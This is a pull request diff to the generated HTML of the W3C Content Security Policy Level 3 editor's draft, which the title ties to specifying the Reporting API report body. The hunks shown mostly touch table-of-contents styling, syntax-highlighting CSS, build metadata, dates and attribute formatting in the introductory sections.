### PR TITLE
Spec the form of the report body delivered to the Reporting API.

### DIFF
--- a/index.html
+++ b/index.html
@@ -992,93 +992,57 @@ Possible extra rowspan handling
 	.toc > li li          { font-weight: normal; }
 	.toc > li li li       { font-size:   95%;    }
 	.toc > li li li li    { font-size:   90%;    }
-	.toc > li li li li .secno { font-size: 85%; }
 	.toc > li li li li li { font-size:   85%;    }
-	.toc > li li li li li .secno { font-size: 100%; }
 
-	/* @supports not (display:grid) { */
-		.toc > li             { margin: 1.5rem 0;    }
-		.toc > li li          { margin: 0.3rem 0;    }
-		.toc > li li li       { margin-left: 2rem;   }
+	.toc > li             { margin: 1.5rem 0;    }
+	.toc > li li          { margin: 0.3rem 0;    }
+	.toc > li li li       { margin-left: 2rem;   }
 
-		/* Section numbers in a column of their own */
-		.toc .secno {
-			float: left;
-			width: 4rem;
-			white-space: nowrap;
-		}
+	/* Section numbers in a column of their own */
+	.toc .secno {
+		float: left;
+		width: 4rem;
+		white-space: nowrap;
+	}
+	.toc > li li li li .secno {
+		font-size: 85%;
+	}
+	.toc > li li li li li .secno {
+		font-size: 100%;
+	}
 
-		.toc li {
-			clear: both;
-		}
+	:not(li) > .toc              { margin-left:  5rem; }
+	.toc .secno                  { margin-left: -5rem; }
+	.toc > li li li .secno       { margin-left: -7rem; }
+	.toc > li li li li .secno    { margin-left: -9rem; }
+	.toc > li li li li li .secno { margin-left: -11rem; }
 
-		:not(li) > .toc              { margin-left:  5rem; }
-		.toc .secno                  { margin-left: -5rem; }
-		.toc > li li li .secno       { margin-left: -7rem; }
-		.toc > li li li li .secno    { margin-left: -9rem; }
-		.toc > li li li li li .secno { margin-left: -11rem; }
+	/* Tighten up indentation in narrow ToCs */
+	@media (max-width: 30em) {
+		:not(li) > .toc              { margin-left:  4rem; }
+		.toc .secno                  { margin-left: -4rem; }
+		.toc > li li li              { margin-left:  1rem; }
+		.toc > li li li .secno       { margin-left: -5rem; }
+		.toc > li li li li .secno    { margin-left: -6rem; }
+		.toc > li li li li li .secno { margin-left: -7rem; }
+	}
+	@media screen and (min-width: 78em) {
+		body:not(.toc-inline) :not(li) > .toc              { margin-left:  4rem; }
+		body:not(.toc-inline) .toc .secno                  { margin-left: -4rem; }
+		body:not(.toc-inline) .toc > li li li              { margin-left:  1rem; }
+		body:not(.toc-inline) .toc > li li li .secno       { margin-left: -5rem; }
+		body:not(.toc-inline) .toc > li li li li .secno    { margin-left: -6rem; }
+		body:not(.toc-inline) .toc > li li li li li .secno { margin-left: -7rem; }
+	}
+	body.toc-sidebar #toc :not(li) > .toc              { margin-left:  4rem; }
+	body.toc-sidebar #toc .toc .secno                  { margin-left: -4rem; }
+	body.toc-sidebar #toc .toc > li li li              { margin-left:  1rem; }
+	body.toc-sidebar #toc .toc > li li li .secno       { margin-left: -5rem; }
+	body.toc-sidebar #toc .toc > li li li li .secno    { margin-left: -6rem; }
+	body.toc-sidebar #toc .toc > li li li li li .secno { margin-left: -7rem; }
 
-		/* Tighten up indentation in narrow ToCs */
-		@media (max-width: 30em) {
-			:not(li) > .toc              { margin-left:  4rem; }
-			.toc .secno                  { margin-left: -4rem; }
-			.toc > li li li              { margin-left:  1rem; }
-			.toc > li li li .secno       { margin-left: -5rem; }
-			.toc > li li li li .secno    { margin-left: -6rem; }
-			.toc > li li li li li .secno { margin-left: -7rem; }
-		}
-	/* } */
-
-	@supports (display:grid) {
-		/* Use #toc over .toc to override non-@supports rules. */
-		#toc {
-			display: grid;
-			align-content: start;
-			grid-template-columns: auto 1fr;
-			grid-column-gap: 1rem;
-			column-gap: 1rem;
-			grid-row-gap: .6rem;
-			row-gap: .6rem;
-		}
-		#toc h2 {
-			grid-column: 1 / -1;
-			margin-bottom: 0;
-		}
-		#toc ol,
-		#toc li,
-		#toc a {
-			display: contents;
-			/* Switch <a> to subgrid when supported */
-		}
-		#toc span {
-			margin: 0;
-		}
-		#toc > .toc > li > a > span {
-			/* The spans of the top-level list,
-			   comprising the first items of each top-level section. */
-			margin-top: 1.1rem;
-		}
-		#toc#toc .secno { /* Ugh, need more specificity to override base.css */
-			grid-column: 1;
-			width: auto;
-			margin-left: 0;
-		}
-		#toc .content {
-			grid-column: 2;
-			width: auto;
-			margin-right: 1rem;
-		}
-		#toc .content:hover {
-			background: rgba(75%, 75%, 75%, .25);
-			border-bottom: 3px solid #054572;
-			margin-bottom: -3px;
-		}
-		#toc li li li .content {
-			margin-left: 1rem;
-		}
-		#toc li li li li .content {
-			margin-left: 2rem;
-		}
+	.toc li {
+		clear: both;
 	}
 
 
@@ -1212,9 +1176,9 @@ Possible extra rowspan handling
 		}
 	}
 </style>
-  <meta content="Bikeshed version 6dcb46ba8cae3704b42c05bcd8578c92d239786a" name="generator">
+  <meta content="Bikeshed version fbf1456a756299b3ff6d248d0857ec87f2e68cd7" name="generator">
   <link href="https://www.w3.org/TR/CSP3/" rel="canonical">
-  <meta content="0ca85b6d105c77a885427ddb4ee750af3a455955" name="document-revision">
+  <meta content="e96149d9062053cc692a65717ef67b2f3aeead86" name="document-revision">
 <style>
   ul.toc ul ul ul {
     margin: 0 0 0 2em;
@@ -1333,17 +1297,6 @@ figcaption {
 figcaption:not(.no-marker)::before {
     content: "Figure " counter(figure) " ";
 }</style>
-<style>/* style-var-click-highlighting */
-
-    var { cursor: pointer; }
-    var.selected0 { background-color: #F4D200; box-shadow: 0 0 0 2px #F4D200; }
-    var.selected1 { background-color: #FF87A2; box-shadow: 0 0 0 2px #FF87A2; }
-    var.selected2 { background-color: #96E885; box-shadow: 0 0 0 2px #96E885; }
-    var.selected3 { background-color: #3EEED2; box-shadow: 0 0 0 2px #3EEED2; }
-    var.selected4 { background-color: #EACFB6; box-shadow: 0 0 0 2px #EACFB6; }
-    var.selected5 { background-color: #82DDFF; box-shadow: 0 0 0 2px #82DDFF; }
-    var.selected6 { background-color: #FFBCF2; box-shadow: 0 0 0 2px #FFBCF2; }
-    </style>
 <style>/* style-autolinks */
 
 .css.css, .property.property, .descriptor.descriptor {
@@ -1408,104 +1361,104 @@ pre .property::before, pre .property::after {
 }</style>
 <style>/* style-dfn-panel */
 
-.dfn-panel {
-    position: absolute;
-    z-index: 35;
-    height: auto;
-    width: -webkit-fit-content;
-    width: fit-content;
-    max-width: 300px;
-    max-height: 500px;
-    overflow: auto;
-    padding: 0.5em 0.75em;
-    font: small Helvetica Neue, sans-serif, Droid Sans Fallback;
-    background: #DDDDDD;
-    color: black;
-    border: outset 0.2em;
-}
-.dfn-panel:not(.on) { display: none; }
-.dfn-panel * { margin: 0; padding: 0; text-indent: 0; }
-.dfn-panel > b { display: block; }
-.dfn-panel a { color: black; }
-.dfn-panel a:not(:hover) { text-decoration: none !important; border-bottom: none !important; }
-.dfn-panel > b + b { margin-top: 0.25em; }
-.dfn-panel ul { padding: 0; }
-.dfn-panel li { list-style: inside; }
-.dfn-panel.activated {
-    display: inline-block;
-    position: fixed;
-    left: .5em;
-    bottom: 2em;
-    margin: 0 auto;
-    max-width: calc(100vw - 1.5em - .4em - .5em);
-    max-height: 30vh;
-}
+        .dfn-panel {
+            position: absolute;
+            z-index: 35;
+            height: auto;
+            width: -webkit-fit-content;
+            width: fit-content;
+            max-width: 300px;
+            max-height: 500px;
+            overflow: auto;
+            padding: 0.5em 0.75em;
+            font: small Helvetica Neue, sans-serif, Droid Sans Fallback;
+            background: #DDDDDD;
+            color: black;
+            border: outset 0.2em;
+        }
+        .dfn-panel:not(.on) { display: none; }
+        .dfn-panel * { margin: 0; padding: 0; text-indent: 0; }
+        .dfn-panel > b { display: block; }
+        .dfn-panel a { color: black; }
+        .dfn-panel a:not(:hover) { text-decoration: none !important; border-bottom: none !important; }
+        .dfn-panel > b + b { margin-top: 0.25em; }
+        .dfn-panel ul { padding: 0; }
+        .dfn-panel li { list-style: inside; }
+        .dfn-panel.activated {
+            display: inline-block;
+            position: fixed;
+            left: .5em;
+            bottom: 2em;
+            margin: 0 auto;
+            max-width: calc(100vw - 1.5em - .4em - .5em);
+            max-height: 30vh;
+        }
 
-.dfn-paneled { cursor: pointer; }
-</style>
+        .dfn-paneled { cursor: pointer; }
+        </style>
 <style>/* style-syntax-highlighting */
 pre.idl.highlight { color: #708090; }
 .highlight:not(.idl) { background: hsl(24, 20%, 95%); }
 code.highlight { padding: .1em; border-radius: .3em; }
 pre.highlight, pre > code.highlight { display: block; padding: 1em; margin: .5em 0; overflow: auto; border-radius: 0; }
-c-[a] { color: #990055 } /* Keyword.Declaration */
-c-[b] { color: #990055 } /* Keyword.Type */
-c-[c] { color: #708090 } /* Comment */
-c-[d] { color: #708090 } /* Comment.Multiline */
-c-[e] { color: #0077aa } /* Name.Attribute */
-c-[f] { color: #669900 } /* Name.Tag */
-c-[g] { color: #222222 } /* Name.Variable */
-c-[k] { color: #990055 } /* Keyword */
-c-[l] { color: #000000 } /* Literal */
-c-[m] { color: #000000 } /* Literal.Number */
-c-[n] { color: #0077aa } /* Name */
-c-[o] { color: #999999 } /* Operator */
-c-[p] { color: #999999 } /* Punctuation */
-c-[s] { color: #a67f59 } /* Literal.String */
-c-[t] { color: #a67f59 } /* Literal.String.Single */
-c-[u] { color: #a67f59 } /* Literal.String.Double */
-c-[cp] { color: #708090 } /* Comment.Preproc */
-c-[c1] { color: #708090 } /* Comment.Single */
-c-[cs] { color: #708090 } /* Comment.Special */
-c-[kc] { color: #990055 } /* Keyword.Constant */
-c-[kn] { color: #990055 } /* Keyword.Namespace */
-c-[kp] { color: #990055 } /* Keyword.Pseudo */
-c-[kr] { color: #990055 } /* Keyword.Reserved */
-c-[ld] { color: #000000 } /* Literal.Date */
-c-[nc] { color: #0077aa } /* Name.Class */
-c-[no] { color: #0077aa } /* Name.Constant */
-c-[nd] { color: #0077aa } /* Name.Decorator */
-c-[ni] { color: #0077aa } /* Name.Entity */
-c-[ne] { color: #0077aa } /* Name.Exception */
-c-[nf] { color: #0077aa } /* Name.Function */
-c-[nl] { color: #0077aa } /* Name.Label */
-c-[nn] { color: #0077aa } /* Name.Namespace */
-c-[py] { color: #0077aa } /* Name.Property */
-c-[ow] { color: #999999 } /* Operator.Word */
-c-[mb] { color: #000000 } /* Literal.Number.Bin */
-c-[mf] { color: #000000 } /* Literal.Number.Float */
-c-[mh] { color: #000000 } /* Literal.Number.Hex */
-c-[mi] { color: #000000 } /* Literal.Number.Integer */
-c-[mo] { color: #000000 } /* Literal.Number.Oct */
-c-[sb] { color: #a67f59 } /* Literal.String.Backtick */
-c-[sc] { color: #a67f59 } /* Literal.String.Char */
-c-[sd] { color: #a67f59 } /* Literal.String.Doc */
-c-[se] { color: #a67f59 } /* Literal.String.Escape */
-c-[sh] { color: #a67f59 } /* Literal.String.Heredoc */
-c-[si] { color: #a67f59 } /* Literal.String.Interpol */
-c-[sx] { color: #a67f59 } /* Literal.String.Other */
-c-[sr] { color: #a67f59 } /* Literal.String.Regex */
-c-[ss] { color: #a67f59 } /* Literal.String.Symbol */
-c-[vc] { color: #0077aa } /* Name.Variable.Class */
-c-[vg] { color: #0077aa } /* Name.Variable.Global */
-c-[vi] { color: #0077aa } /* Name.Variable.Instance */
-c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
+.highlight .c { color: #708090 } /* Comment */
+.highlight .k { color: #990055 } /* Keyword */
+.highlight .l { color: #000000 } /* Literal */
+.highlight .n { color: #0077aa } /* Name */
+.highlight .o { color: #999999 } /* Operator */
+.highlight .p { color: #999999 } /* Punctuation */
+.highlight .cm { color: #708090 } /* Comment.Multiline */
+.highlight .cp { color: #708090 } /* Comment.Preproc */
+.highlight .c1 { color: #708090 } /* Comment.Single */
+.highlight .cs { color: #708090 } /* Comment.Special */
+.highlight .kc { color: #990055 } /* Keyword.Constant */
+.highlight .kd { color: #990055 } /* Keyword.Declaration */
+.highlight .kn { color: #990055 } /* Keyword.Namespace */
+.highlight .kp { color: #990055 } /* Keyword.Pseudo */
+.highlight .kr { color: #990055 } /* Keyword.Reserved */
+.highlight .kt { color: #990055 } /* Keyword.Type */
+.highlight .ld { color: #000000 } /* Literal.Date */
+.highlight .m { color: #000000 } /* Literal.Number */
+.highlight .s { color: #a67f59 } /* Literal.String */
+.highlight .na { color: #0077aa } /* Name.Attribute */
+.highlight .nc { color: #0077aa } /* Name.Class */
+.highlight .no { color: #0077aa } /* Name.Constant */
+.highlight .nd { color: #0077aa } /* Name.Decorator */
+.highlight .ni { color: #0077aa } /* Name.Entity */
+.highlight .ne { color: #0077aa } /* Name.Exception */
+.highlight .nf { color: #0077aa } /* Name.Function */
+.highlight .nl { color: #0077aa } /* Name.Label */
+.highlight .nn { color: #0077aa } /* Name.Namespace */
+.highlight .py { color: #0077aa } /* Name.Property */
+.highlight .nt { color: #669900 } /* Name.Tag */
+.highlight .nv { color: #222222 } /* Name.Variable */
+.highlight .ow { color: #999999 } /* Operator.Word */
+.highlight .mb { color: #000000 } /* Literal.Number.Bin */
+.highlight .mf { color: #000000 } /* Literal.Number.Float */
+.highlight .mh { color: #000000 } /* Literal.Number.Hex */
+.highlight .mi { color: #000000 } /* Literal.Number.Integer */
+.highlight .mo { color: #000000 } /* Literal.Number.Oct */
+.highlight .sb { color: #a67f59 } /* Literal.String.Backtick */
+.highlight .sc { color: #a67f59 } /* Literal.String.Char */
+.highlight .sd { color: #a67f59 } /* Literal.String.Doc */
+.highlight .s2 { color: #a67f59 } /* Literal.String.Double */
+.highlight .se { color: #a67f59 } /* Literal.String.Escape */
+.highlight .sh { color: #a67f59 } /* Literal.String.Heredoc */
+.highlight .si { color: #a67f59 } /* Literal.String.Interpol */
+.highlight .sx { color: #a67f59 } /* Literal.String.Other */
+.highlight .sr { color: #a67f59 } /* Literal.String.Regex */
+.highlight .s1 { color: #a67f59 } /* Literal.String.Single */
+.highlight .ss { color: #a67f59 } /* Literal.String.Symbol */
+.highlight .vc { color: #0077aa } /* Name.Variable.Class */
+.highlight .vg { color: #0077aa } /* Name.Variable.Global */
+.highlight .vi { color: #0077aa } /* Name.Variable.Instance */
+.highlight .il { color: #000000 } /* Literal.Number.Integer.Long */
 </style>
  <body class="h-entry">
   <div class="head">
    <p data-fill-with="logo"><a class="logo" href="https://www.w3.org/"> <img alt="W3C" height="48" src="https://www.w3.org/StyleSheets/TR/2016/logos/W3C" width="72"> </a> </p>
    <h1>Content Security Policy Level 3</h1>
-   <h2 class="no-num no-toc no-ref heading settled" id="subtitle"><span class="content">Editor’s Draft, <time class="dt-updated" datetime="2018-12-27">27 December 2018</time></span></h2>
+   <h2 class="no-num no-toc no-ref heading settled" id="subtitle"><span class="content">Editor’s Draft, <time class="dt-updated" datetime="2019-02-21">21 February 2019</time></span></h2>
    <div data-fill-with="spec-metadata">
     <dl>
      <dt>This version:
@@ -1517,7 +1470,7 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
      <dt>Version History:
      <dd><a href="https://github.com/w3c/webappsec-csp/commits/master/index.src.html">https://github.com/w3c/webappsec-csp/commits/master/index.src.html</a>
      <dt>Feedback:
-     <dd><span><a href="mailto:public-webappsec@w3.org?subject=%5BCSP3%5D%20YOUR%20TOPIC%20HERE">public-webappsec@w3.org</a> with subject line “<kbd>[CSP3] <i data-lt>… message topic …</i></kbd>” (<a href="https://lists.w3.org/Archives/Public/public-webappsec/" rel="discussion">archives</a>)</span>
+     <dd><span><a href="mailto:public-webappsec@w3.org?subject=%5Bcsp3%5D%20YOUR%20TOPIC%20HERE">public-webappsec@w3.org</a> with subject line “<kbd>[csp3] <i data-lt="">… message topic …</i></kbd>” (<a href="https://lists.w3.org/Archives/Public/public-webappsec/" rel="discussion">archives</a>)</span>
      <dt class="editor">Editor:
      <dd class="editor p-author h-card vcard" data-editor-id="56384"><a class="p-name fn u-email email" href="mailto:mkwst@google.com">Mike West</a> (<span class="p-org org">Google Inc.</span>)
      <dt>Participate:
@@ -1527,15 +1480,15 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
     </dl>
    </div>
    <div data-fill-with="warning"></div>
-   <p class="copyright" data-fill-with="copyright"><a href="https://www.w3.org/Consortium/Legal/ipr-notice#Copyright">Copyright</a> © 2018 <a href="https://www.w3.org/"><abbr title="World Wide Web Consortium">W3C</abbr></a><sup>®</sup> (<a href="https://www.csail.mit.edu/"><abbr title="Massachusetts Institute of Technology">MIT</abbr></a>, <a href="https://www.ercim.eu/"><abbr title="European Research Consortium for Informatics and Mathematics">ERCIM</abbr></a>, <a href="https://www.keio.ac.jp/">Keio</a>, <a href="http://ev.buaa.edu.cn/">Beihang</a>). W3C <a href="https://www.w3.org/Consortium/Legal/ipr-notice#Legal_Disclaimer">liability</a>, <a href="https://www.w3.org/Consortium/Legal/ipr-notice#W3C_Trademarks">trademark</a> and <a href="https://www.w3.org/Consortium/Legal/copyright-documents">document use</a> rules apply. </p>
+   <p class="copyright" data-fill-with="copyright"><a href="https://www.w3.org/Consortium/Legal/ipr-notice#Copyright">Copyright</a> © 2019 <a href="https://www.w3.org/"><abbr title="World Wide Web Consortium">W3C</abbr></a><sup>®</sup> (<a href="https://www.csail.mit.edu/"><abbr title="Massachusetts Institute of Technology">MIT</abbr></a>, <a href="https://www.ercim.eu/"><abbr title="European Research Consortium for Informatics and Mathematics">ERCIM</abbr></a>, <a href="https://www.keio.ac.jp/">Keio</a>, <a href="http://ev.buaa.edu.cn/">Beihang</a>). W3C <a href="https://www.w3.org/Consortium/Legal/ipr-notice#Legal_Disclaimer">liability</a>, <a href="https://www.w3.org/Consortium/Legal/ipr-notice#W3C_Trademarks">trademark</a> and <a href="https://www.w3.org/Consortium/Legal/copyright-documents">document use</a> rules apply. </p>
    <hr title="Separator for header">
   </div>
   <div class="p-summary" data-fill-with="abstract">
    <h2 class="no-num no-toc no-ref heading settled" id="abstract"><span class="content">Abstract</span></h2>
    <p>This document defines a mechanism by which web developers can control the
 
-  resources which a particular page can fetch or execute, as well as a number
-  of security-relevant policy decisions.</p>
+resources which a particular page can fetch or execute, as well as a number
+of security-relevant policy decisions.</p>
   </div>
   <h2 class="no-num no-toc no-ref heading settled" id="status"><span class="content">Status of this document</span></h2>
   <div data-fill-with="status">
@@ -1544,19 +1497,19 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
 	Its publication here does not imply endorsement of its contents by W3C.
 	Don’t cite this document other than as work in progress. </p>
    <p> <strong>Changes to this document may be tracked at <a href="https://github.com/w3c/webappsec">https://github.com/w3c/webappsec</a>.</strong> </p>
-   <p> The (<a href="https://lists.w3.org/Archives/Public/public-webappsec/">archived</a>) public mailing list <a href="mailto:public-webappsec@w3.org?Subject=%5BCSP3%5D%20PUT%20SUBJECT%20HERE">public-webappsec@w3.org</a> (see <a href="https://www.w3.org/Mail/Request">instructions</a>)
+   <p> The (<a href="https://lists.w3.org/Archives/Public/public-webappsec/">archived</a>) public mailing list <a href="mailto:public-webappsec@w3.org?Subject=%5Bcsp3%5D%20PUT%20SUBJECT%20HERE">public-webappsec@w3.org</a> (see <a href="https://www.w3.org/Mail/Request">instructions</a>)
 	is preferred for discussion of this specification.
 	When sending e-mail,
-	please put the text “CSP3” in the subject,
+	please put the text “csp3” in the subject,
 	preferably like this:
-	“[CSP3] <em>…summary of comment…</em>” </p>
+	“[csp3] <em>…summary of comment…</em>” </p>
    <p> This document was produced by the <a href="https://www.w3.org/2011/webappsec/">Web Application Security Working Group</a>. </p>
    <p> This document was produced by a group operating under
-	the <a href="https://www.w3.org/Consortium/Patent-Policy/">W3C Patent Policy</a>.
+	the <a href="https://www.w3.org/Consortium/Patent-Policy-20040205/">5 February 2004 W3C Patent Policy</a>.
 	W3C maintains a <a href="https://www.w3.org/2004/01/pp-impl/49309/status" rel="disclosure">public list of any patent disclosures</a> made in connection with the deliverables of the group;
 	that page also includes instructions for disclosing a patent.
-	An individual who has actual knowledge of a patent which the individual believes contains <a href="https://www.w3.org/Consortium/Patent-Policy/#def-essential">Essential Claim(s)</a> must disclose the information in accordance with <a href="https://www.w3.org/Consortium/Patent-Policy/#sec-Disclosure">section 6 of the W3C Patent Policy</a>. </p>
-   <p> This document is governed by the <a href="https://www.w3.org/2018/Process-20180201/" id="w3c_process_revision">1 February 2018 W3C Process Document</a>. </p>
+	An individual who has actual knowledge of a patent which the individual believes contains <a href="https://www.w3.org/Consortium/Patent-Policy-20040205/#def-essential">Essential Claim(s)</a> must disclose the information in accordance with <a href="https://www.w3.org/Consortium/Patent-Policy-20040205/#sec-Disclosure">section 6 of the W3C Patent Policy</a>. </p>
+   <p> This document is governed by the <a href="https://www.w3.org/2017/Process-20170301/" id="w3c_process_revision">1 March 2017 W3C Process Document</a>. </p>
    <p></p>
   </div>
   <div data-fill-with="at-risk">
@@ -1914,7 +1867,7 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
    <section>
     <h2 class="heading settled" data-level="1" id="intro"><span class="secno">1. </span><span class="content">Introduction</span><a class="self-link" href="#intro"></a></h2>
     <p><em>This section is not normative.</em></p>
-    <p>This document defines <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="content-security-policy">Content Security Policy</dfn> (CSP), a tool
+    <p>This document defines <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="content-security-policy">Content Security Policy</dfn> (CSP), a tool
   which developers can use to lock down their applications in various ways,
   mitigating the risk of content injection vulnerabilities such as cross-site scripting, and
   reducing the privilege with which their applications execute.</p>
@@ -1929,8 +1882,8 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
   functionality.</p>
     <h3 class="heading settled" data-level="1.1" id="examples"><span class="secno">1.1. </span><span class="content">Examples</span><a class="self-link" href="#examples"></a></h3>
     <h4 class="heading settled" data-level="1.1.1" id="example-basic"><span class="secno">1.1.1. </span><span class="content">Control Execution</span><a class="self-link" href="#example-basic"></a></h4>
-    <div class="example" id="example-1a2032b4">
-     <a class="self-link" href="#example-1a2032b4"></a> MegaCorp Inc’s developers want to protect themselves against cross-site
+    <div class="example" id="example-9ac5cb84">
+     <a class="self-link" href="#example-9ac5cb84"></a> MegaCorp Inc’s developers want to protect themselves against cross-site
     scripting attacks. They can mitigate the risk of script injection by
     ensuring that their trusted CDN is the only origin from which script can
     load and execute. Moreover, they wish to ensure that no plugins can
@@ -1941,28 +1894,28 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
     <h3 class="heading settled" data-level="1.2" id="goals"><span class="secno">1.2. </span><span class="content">Goals</span><a class="self-link" href="#goals"></a></h3>
     <p>Content Security Policy aims to do to a few related things:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Mitigate the risk of content-injection attacks by giving developers
   fairly granular control over</p>
       <ul>
-       <li data-md>
+       <li data-md="">
         <p>The resources which can be requested (and subsequently embedded or
   executed) on behalf of a specific <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document">Document</a></code> or <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#worker" id="ref-for-worker">Worker</a></code></p>
-       <li data-md>
+       <li data-md="">
         <p>The execution of inline script</p>
-       <li data-md>
+       <li data-md="">
         <p>Dynamic code execution (via <code class="idl"><a data-link-type="idl" href="https://tc39.github.io/ecma262#sec-eval-x" id="ref-for-sec-eval-x">eval()</a></code> and similar constructs)</p>
-       <li data-md>
+       <li data-md="">
         <p>The application of inline style</p>
       </ul>
-     <li data-md>
+     <li data-md="">
       <p>Mitigate the risk of attacks which require a resource to be embedded
   in a malicious context (the "Pixel Perfect" attack described in <a data-link-type="biblio" href="#biblio-timing">[TIMING]</a>, for example) by giving developers granular control over the
   origins which can embed a given resource.</p>
-     <li data-md>
+     <li data-md="">
       <p>Provide a policy framework which allows developers to reduce the privilege
   of their applications.</p>
-     <li data-md>
+     <li data-md="">
       <p>Provide a reporting mechanism which allows developers to detect flaws
   being exploited in the wild.</p>
     </ol>
@@ -1970,55 +1923,55 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
     <p>This document describes an evolution of the Content Security Policy Level 2
   specification <a data-link-type="biblio" href="#biblio-csp2">[CSP2]</a>. The following is a high-level overview of the changes:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>The specification has been rewritten from the ground up in terms of the <a data-link-type="biblio" href="#biblio-fetch">[FETCH]</a> specification, which should make it simpler to integrate CSP’s
   requirements and restrictions with other specifications (and with
   Service Workers in particular).</p>
-     <li data-md>
+     <li data-md="">
       <p>The <code>child-src</code> model has been substantially altered:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>The <code>frame-src</code> directive, which was deprecated in CSP Level
  2, has been undeprecated, but continues to defer to <code>child-src</code> if
  not present (which defers to <code>default-src</code> in turn).</p>
-       <li data-md>
+       <li data-md="">
         <p>A <code>worker-src</code> directive has been added, deferring to <code>child-src</code> if not present (which likewise defers to <code>script-src</code> and
  eventually <code>default-src</code>).</p>
-       <li data-md>
+       <li data-md="">
         <p>Dedicated workers now always inherit their creator’s policy.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>The URL matching algorithm now treats insecure schemes and ports as
   matching their secure variants. That is, the source expression <code>http://example.com:80</code> will match both <code>http://example.com:80</code> and <code>https://example.com:443</code>.</p>
       <p>Likewise, <code>'self'</code> now matches <code>https:</code> and <code>wss:</code> variants of the page’s
   origin, even on pages whose scheme is <code>http</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Violation reports generated from inline script or style will now report
   "<code>inline</code>" as the blocked resource. Likewise, blocked <code>eval()</code> execution
   will report "<code>eval</code>" as the blocked resource.</p>
-     <li data-md>
+     <li data-md="">
       <p>The <code>manifest-src</code> directive has been added.</p>
-     <li data-md>
+     <li data-md="">
       <p>The <code>report-uri</code> directive is deprecated in favor of the new <code>report-to</code> directive, which relies on <a data-link-type="biblio" href="#biblio-reporting">[REPORTING]</a> as infrastructure.</p>
-     <li data-md>
+     <li data-md="">
       <p>The <code>'strict-dynamic'</code> source expression will now allow script which
   executes on a page to load more script via non-<a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted" id="ref-for-parser-inserted">"parser-inserted"</a> <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script">script</a></code> elements. Details are in <a href="#strict-dynamic-usage">§8.2 Usage of "'strict-dynamic'"</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>The <code>'unsafe-hashes'</code> source expression will now allow event
   handlers, style attributes and <code>javascript:</code> navigation targets to match
   hashes. Details in <a href="#unsafe-hashes-usage">§8.3 Usage of "'unsafe-hashes'"</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>The <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression">source expression</a> matching has been changed to require explicit presence
   of any non-<a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#network-scheme" id="ref-for-network-scheme">network scheme</a>, rather than <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#local-scheme" id="ref-for-local-scheme">local scheme</a>,
   unless that non-<a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#network-scheme" id="ref-for-network-scheme①">network scheme</a> is the same as the scheme of protected resource,
   as described in <a href="#match-url-to-source-expression">§6.6.2.6 Does url match expression in origin with redirect count?</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Hash-based source expressions may now match external scripts if the <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script①">script</a></code> element that triggers the request specifies a set of integrity
   metadata which is listed in the current policy. Details in <a href="#external-hash">§8.4 Allowing external JavaScript via hashes</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>The <a data-link-type="dfn" href="#navigate-to" id="ref-for-navigate-to"><code>navigate-to</code></a> directive gives a resource control over the endpoints
   to which it can initiate navigation.</p>
-     <li data-md>
+     <li data-md="">
       <p>Reports generated for inline violations will contain a <a data-link-type="dfn" href="#violation-sample" id="ref-for-violation-sample">sample</a> attribute if the relevant directive contains the <a data-link-type="grammar" href="#grammardef-report-sample" id="ref-for-grammardef-report-sample"><code>'report-sample'</code></a> expression.</p>
     </ol>
    </section>
@@ -2037,106 +1990,106 @@ c-[il] { color: #000000 } /* Literal.Number.Integer.Long */
     <p>This document depends on the Infra Standard for a number of foundational concepts used in its
   algorithms and prose <a data-link-type="biblio" href="#biblio-infra">[INFRA]</a>.</p>
     <p>The following definitions are used to improve readability of other definitions in this document.</p>
-<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-optional-ascii-whitespace">optional-ascii-whitespace</dfn> = *( %x09 / %x0A / %x0C / %x0D / %x20 )
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-required-ascii-whitespace">required-ascii-whitespace</dfn> = 1*( %x09 / %x0A / %x0C / %x0D / %x20 )
-; These productions match the definition of <a data-link-type="grammar" href="https://infra.spec.whatwg.org/#ascii-whitespace" id="ref-for-ascii-whitespace">ASCII whitespace</a> from the <a data-link-type="grammar" href="https://infra.spec.whatwg.org/#" id="termref-for-">INFRA</a> standard.
+<pre><dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-optional-ascii-whitespace">optional-ascii-whitespace</dfn> = *( %x09 / %x0A / %x0C / %x0D / %x20 )
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-required-ascii-whitespace">required-ascii-whitespace</dfn> = 1*( %x09 / %x0A / %x0C / %x0D / %x20 )
+; These productions match the definition of <a data-link-type="grammar" href="https://infra.spec.whatwg.org/#ascii-whitespace" id="ref-for-ascii-whitespace">ASCII whitespace</a> from the <a data-link-type="grammar" href="https://infra.spec.whatwg.org/#">INFRA</a> standard.
 </pre>
